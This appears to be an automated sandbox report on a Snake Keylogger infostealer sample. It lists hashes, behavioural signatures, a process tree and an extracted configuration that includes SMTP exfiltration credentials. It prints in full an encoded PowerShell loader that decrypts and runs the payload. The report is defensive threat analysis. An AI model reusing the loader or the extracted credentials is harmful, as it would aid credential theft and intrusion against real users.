Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
14-05-2024 16:14
Static task
static1
Behavioral task
behavioral1
Sample
5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe
Resource
win10v2004-20240508-en
General
-
Target
5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe
-
Size
30.7MB
-
MD5
beec77b6b798c503ecf2284fa6026078
-
SHA1
85bae44e72a7b65820b0fff7fdfefa285fb2f7cd
-
SHA256
5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a
-
SHA512
8db23bff39a52ac9f956397ceb71e1e313bcd228a24faf4a17760a768e8895f94a170704748f8a7546da63a650e69747c66d84c6a11dfd1908ba9d743b3266be
-
SSDEEP
393216:dQgHDlanaGBXvDKtz+bhPWES4tiNQPNrIKc4gaPbUAgrO4mga96l+ZArYsFRl7D:d3on1HvSzxAMNaFZArYsf
Malware Config
Extracted
snakekeylogger
Protocol: smtp- Host:
mail.gbogboro.com - Port:
587 - Username:
[email protected] - Password:
Egoamaka@123
https://scratchdreams.tk
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/1760-33-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
regasm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 regasm.exe Key opened \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 regasm.exe Key opened \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 regasm.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 21 checkip.dyndns.org -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2700 set thread context of 1760 2700 powershell.exe regasm.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
powershell.exeregasm.exepid process 2700 powershell.exe 2700 powershell.exe 2700 powershell.exe 2700 powershell.exe 2700 powershell.exe 2700 powershell.exe 2700 powershell.exe 2700 powershell.exe 1760 regasm.exe 1760 regasm.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeregasm.exedescription pid process Token: SeDebugPrivilege 2700 powershell.exe Token: SeDebugPrivilege 1760 regasm.exe -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.execmd.exepowershell.execsc.exedescription pid process target process PID 4092 wrote to memory of 3548 4092 5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe cmd.exe PID 4092 wrote to memory of 3548 4092 5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe cmd.exe PID 3548 wrote to memory of 2700 3548 cmd.exe powershell.exe PID 3548 wrote to memory of 2700 3548 cmd.exe powershell.exe PID 2700 wrote to memory of 932 2700 powershell.exe csc.exe PID 2700 wrote to memory of 932 2700 powershell.exe csc.exe PID 932 wrote to memory of 988 932 csc.exe cvtres.exe PID 932 wrote to memory of 988 932 csc.exe cvtres.exe PID 2700 wrote to memory of 3504 2700 powershell.exe AddInProcess32.exe PID 2700 wrote to memory of 3504 2700 powershell.exe AddInProcess32.exe PID 2700 wrote to memory of 3504 2700 powershell.exe AddInProcess32.exe PID 2700 wrote to memory of 1672 2700 powershell.exe installutil.exe PID 2700 wrote to memory of 1672 2700 powershell.exe installutil.exe PID 2700 wrote to memory of 1672 2700 powershell.exe installutil.exe PID 2700 wrote to memory of 1760 2700 powershell.exe regasm.exe PID 2700 wrote to memory of 1760 2700 powershell.exe regasm.exe PID 2700 wrote to memory of 1760 2700 powershell.exe regasm.exe PID 2700 wrote to memory of 1760 2700 powershell.exe regasm.exe PID 2700 wrote to memory of 1760 2700 powershell.exe regasm.exe PID 2700 wrote to memory of 1760 2700 powershell.exe regasm.exe PID 2700 wrote to memory of 1760 2700 powershell.exe regasm.exe PID 2700 wrote to memory of 1760 2700 powershell.exe regasm.exe -
outlook_office_path 1 IoCs
Processes:
regasm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 regasm.exe -
outlook_win_path 1 IoCs
Processes:
regasm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 regasm.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe"C:\Users\Admin\AppData\Local\Temp\5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4092 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe -EncodedCommand CgBmAHUAbgBjAHQAaQBvAG4AIADjicZbIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAKWUGVMsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABFUz5EsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAHBlbmMKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAKBSxltoViAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJACgUsZbaFYuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJACgUsZbaFYuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkAOOJxltoViAAPQAgACQAoFLGW2hWLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQApZQZUywAIAAkABFUz5EpAAoAIAAgACAAIAAkAOOJxltwZW5jIAA9ACAAJADjicZbaFYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAHBlbmMsACAAMAAsACAAJABwZW5jLgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAOOJxltwZW5jCgB9AAoACgAkAKWUGVMgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAA0AEEALAAwAHgAMAA0ACwAMAB4AEUARgAsADAAeAA4ADUALAAwAHgAMwA4ACwAMAB4ADkAMAAsADAAeABGAEUALAAwAHgANAA4ACwAMAB4ADQANgAsADAAeABGADIALAAwAHgAMgA5ACwAMAB4AEEARQAsADAAeABBADkALAAwAHgAOAA2ACwAMAB4ADcAQQAsADAAeAA1ADcALAAwAHgANQBCACwAMAB4AEEANgAsADAAeABCADEALAAwAHgANAAwACwAMAB4ADgAQQAsADAAeABFADEALAAwAHgAMAAwACwAMAB4ADMANAAsADAAeAA5AEQALAAwAHgARQA2ACwAMAB4ADMAMwAsADAAeAA3ADQALAAwAHgARQBEACwAMAB4ADIAMgAsADAAeABEADMALAAwAHgAMABFACkACgAkABFUz5EgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAwADQALAAwAHgAQwA3ACwAMAB4ADAAMwAsADAAeAA2ADcALAAwAHgAMQBFACwAMAB4AEYAQQAsADAAeAAyADcALAAwAHgAQgBBACwAMAB4ADEANQAsADAAeABDADEALAAwAHgAQgBCACwAMAB4AEQANAAsADAAeAA3AEEALAAwAHgANQA0ACwAMAB4ADkANQAsADAAeAA3ADgAKQAKAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwAKAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAJCWz4WXeuNTIAB7AAoAIAAgACAAIABbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAIAA9ACAAIgBHAGUAdABGAG8AcgBlAGcAcgBvAHUAbgBkAFcAaQBuAGQAbwB3ACIAKQBdAAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgALeD1lNTX01Sl3rjUygAKQA7AAoACgAgACAAIAAgAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAAgAD0AIAAiAFMAaABvAHcAVwBpAG4AZABvAHcAIgApAF0ACgAgACAAIAAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIAA+Zjp5l3rjUygASQBuAHQAUAB0AHIAIACXeuNT5VPEZywAIABpAG4AdAAgAH1U5E4pADsACgAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAHYAbwBpAGQAIACQls+FU19NUpd641MoACkAIAB7AAoAIAAgACAAIAAgACAAIAAgAEkAbgB0AFAAdAByACAA5VPEZyAAPQAgALeD1lNTX01Sl3rjUygAKQA7AAoAIAAgACAAIAAgACAAIAAgAD5mOnmXeuNTKADlU8RnLAAgADAAKQA7AAoAIAAgACAAIAB9AAoAfQAKACIAQAAgAC0ATABhAG4AZwB1AGEAZwBlACAAQwBTAGgAYQByAHAACgAKAFsAkJbPhZd641NdADoAOgCQls+FU19NUpd641MoACkACgAKACQAh2X2Tu+NhF8gAD0AIAAnAEMAOgBcAFwAVQBzAGUAcgBzAFwAXABBAGQAbQBpAG4AXABcAEEAcABwAEQAYQB0AGEAXABcAEwAbwBjAGEAbABcAFwAVABlAG0AcABcAFwAZgBpAGwAZQAtADEANwBkAGMAegA5ADAAOABrAC4AdABtAHAAJwA7AAoAJACgUsZbV1uCgiAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJACHZfZO742EXykAOwAKACQA44nGW4VRuVsgAD0AIADjicZbIAAtAKWUGVMgACQApZQZUyAALQARVM+RIAAkABFUz5EgAC0AcGVuYyAAJACgUsZbV1uCggoACgAkAAt6j17GliAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQA44nGW4VRuVspACkAOwAKACQAZVHjU7lwIAA9ACAAJAALeo9expYuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAKACQAZVHjU7lwLgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAJABuAHUAbABsACkAOwAKAA=="2⤵
- Suspicious use of WriteProcessMemory
PID:3548 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -EncodedCommand CgBmAHUAbgBjAHQAaQBvAG4AIADjicZbIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAKWUGVMsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABFUz5EsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAHBlbmMKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAKBSxltoViAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJACgUsZbaFYuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJACgUsZbaFYuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkAOOJxltoViAAPQAgACQAoFLGW2hWLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQApZQZUywAIAAkABFUz5EpAAoAIAAgACAAIAAkAOOJxltwZW5jIAA9ACAAJADjicZbaFYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAHBlbmMsACAAMAAsACAAJABwZW5jLgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAOOJxltwZW5jCgB9AAoACgAkAKWUGVMgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAA0AEEALAAwAHgAMAA0ACwAMAB4AEUARgAsADAAeAA4ADUALAAwAHgAMwA4ACwAMAB4ADkAMAAsADAAeABGAEUALAAwAHgANAA4ACwAMAB4ADQANgAsADAAeABGADIALAAwAHgAMgA5ACwAMAB4AEEARQAsADAAeABBADkALAAwAHgAOAA2ACwAMAB4ADcAQQAsADAAeAA1ADcALAAwAHgANQBCACwAMAB4AEEANgAsADAAeABCADEALAAwAHgANAAwACwAMAB4ADgAQQAsADAAeABFADEALAAwAHgAMAAwACwAMAB4ADMANAAsADAAeAA5AEQALAAwAHgARQA2ACwAMAB4ADMAMwAsADAAeAA3ADQALAAwAHgARQBEACwAMAB4ADIAMgAsADAAeABEADMALAAwAHgAMABFACkACgAkABFUz5EgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAwADQALAAwAHgAQwA3ACwAMAB4ADAAMwAsADAAeAA2ADcALAAwAHgAMQBFACwAMAB4AEYAQQAsADAAeAAyADcALAAwAHgAQgBBACwAMAB4ADEANQAsADAAeABDADEALAAwAHgAQgBCACwAMAB4AEQANAAsADAAeAA3AEEALAAwAHgANQA0ACwAMAB4ADkANQAsADAAeAA3ADgAKQAKAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwAKAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAJCWz4WXeuNTIAB7AAoAIAAgACAAIABbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAIAA9ACAAIgBHAGUAdABGAG8AcgBlAGcAcgBvAHUAbgBkAFcAaQBuAGQAbwB3ACIAKQBdAAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgALeD1lNTX01Sl3rjUygAKQA7AAoACgAgACAAIAAgAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAAgAD0AIAAiAFMAaABvAHcAVwBpAG4AZABvAHcAIgApAF0ACgAgACAAIAAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIAA+Zjp5l3rjUygASQBuAHQAUAB0AHIAIACXeuNT5VPEZywAIABpAG4AdAAgAH1U5E4pADsACgAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAHYAbwBpAGQAIACQls+FU19NUpd641MoACkAIAB7AAoAIAAgACAAIAAgACAAIAAgAEkAbgB0AFAAdAByACAA5VPEZyAAPQAgALeD1lNTX01Sl3rjUygAKQA7AAoAIAAgACAAIAAgACAAIAAgAD5mOnmXeuNTKADlU8RnLAAgADAAKQA7AAoAIAAgACAAIAB9AAoAfQAKACIAQAAgAC0ATABhAG4AZwB1AGEAZwBlACAAQwBTAGgAYQByAHAACgAKAFsAkJbPhZd641NdADoAOgCQls+FU19NUpd641MoACkACgAKACQAh2X2Tu+NhF8gAD0AIAAnAEMAOgBcAFwAVQBzAGUAcgBzAFwAXABBAGQAbQBpAG4AXABcAEEAcABwAEQAYQB0AGEAXABcAEwAbwBjAGEAbABcAFwAVABlAG0AcABcAFwAZgBpAGwAZQAtADEANwBkAGMAegA5ADAAOABrAC4AdABtAHAAJwA7AAoAJACgUsZbV1uCgiAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJACHZfZO742EXykAOwAKACQA44nGW4VRuVsgAD0AIADjicZbIAAtAKWUGVMgACQApZQZUyAALQARVM+RIAAkABFUz5EgAC0AcGVuYyAAJACgUsZbV1uCggoACgAkAAt6j17GliAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQA44nGW4VRuVspACkAOwAKACQAZVHjU7lwIAA9ACAAJAALeo9expYuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAKACQAZVHjU7lwLgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAJABuAHUAbABsACkAOwAKAA==3⤵
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lavqraz4\lavqraz4.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:932 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7232.tmp" "c:\Users\Admin\AppData\Local\Temp\lavqraz4\CSC6B9C31A59D0C418BB68D15F7CDF64390.TMP"5⤵PID:988
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵PID:3504
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"4⤵PID:1672
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"4⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1760
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5ff85c61475101d65c5055310e83fc8ce
SHA1a8fd9ad64179978299144b2ee1eb41fe14c4e292
SHA256b94a6adb44def755550f0a6c1118bb5017a521f623a7c9f3901ab6e2c3580a29
SHA512e884079c44fab789bba2604b59700c53a26001fb313cf438e997e1a91aada9d40981e40111af8465407551b13c3daa26fc8a258a528cc603e63fad227da5d462
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
20KB
MD5fec0ee7beb18cfe6da97e99a57898163
SHA1f9bfefcfe79858383586541d2ec250e0060fc42c
SHA256301f949a952c4705d69f2d7fcaf13e7055542142d249f7e57793c3548f1c56f7
SHA5122a263c00c95654c7b0ab784f372d59183bf21132ddf4a39a4935cf17a98e1b760fc26ed217c415d1ddeeac8595477e1503fd917d8b878771da7a9501c3c29362
-
Filesize
3KB
MD5bfde046f52141441b5a1115afc352768
SHA134516dbd811e5d4aecc2b87b833a0a9c875d9fcb
SHA2567baf9423c8643393042e82e257ea6e2d4e3cfa08bcd11a1c2b0b14ea36d2552d
SHA5122fcba66ae4c2cb1b16acd5b60de63cc1aeedf46edddf131a7d71a274853e9fdf85c94749817813f5f94950b7e2e35e5033f6d7e6bfaefea602553ebb2e76bf11
-
Filesize
652B
MD567ffe76c3435e63a73b85f02c755987d
SHA1933875ee6f12e2fbd685c628736ab78781337713
SHA25699010bd1020fa2cdd36219e2457646fbf521a2f2132c0c18701a78fa5a028783
SHA51286d24a26dfc3f14105f731fe277869114451ab63c35f6b4ead1a51b77ec36fda9ca14a30fcaaeb29c47b4c5dd0a57aac27b59978c1d4a7dfc80d49220f8cd6b5
-
Filesize
479B
MD52d582d49bc5da0270e19e27903336497
SHA101065a81afc9e4ec356ef1998ec15535f7ea5d09
SHA2561104ec9aaa6d72466e966359f4e147da4a11ac8ba4c1d36f45fdf83ee76e16dc
SHA51203ef2d744cc6152d5723574d34bf06c5bd65264999e8eade3e48159367fb05067cd071ee37225947ff4b9286d0f11b6963e2d42a1e9c26a3ffc47b76bbf3a5e6
-
Filesize
369B
MD5b4d92e9d90cf675d353fcdbbd1bd4605
SHA1acb24588cfe2db642676fe32df1ad3427db93477
SHA25682dd4c9027c9b90fab9e895e4c1788786f4bb6690f270ae6c598cce30d7e688c
SHA512263c70daf325ac9219d032beeabba204906612159ac5ea1c0cd57b15a760c1733346a71a9e5047bfdb1be5cac8349d19f4134702ad9ac54081889d4cdee029e0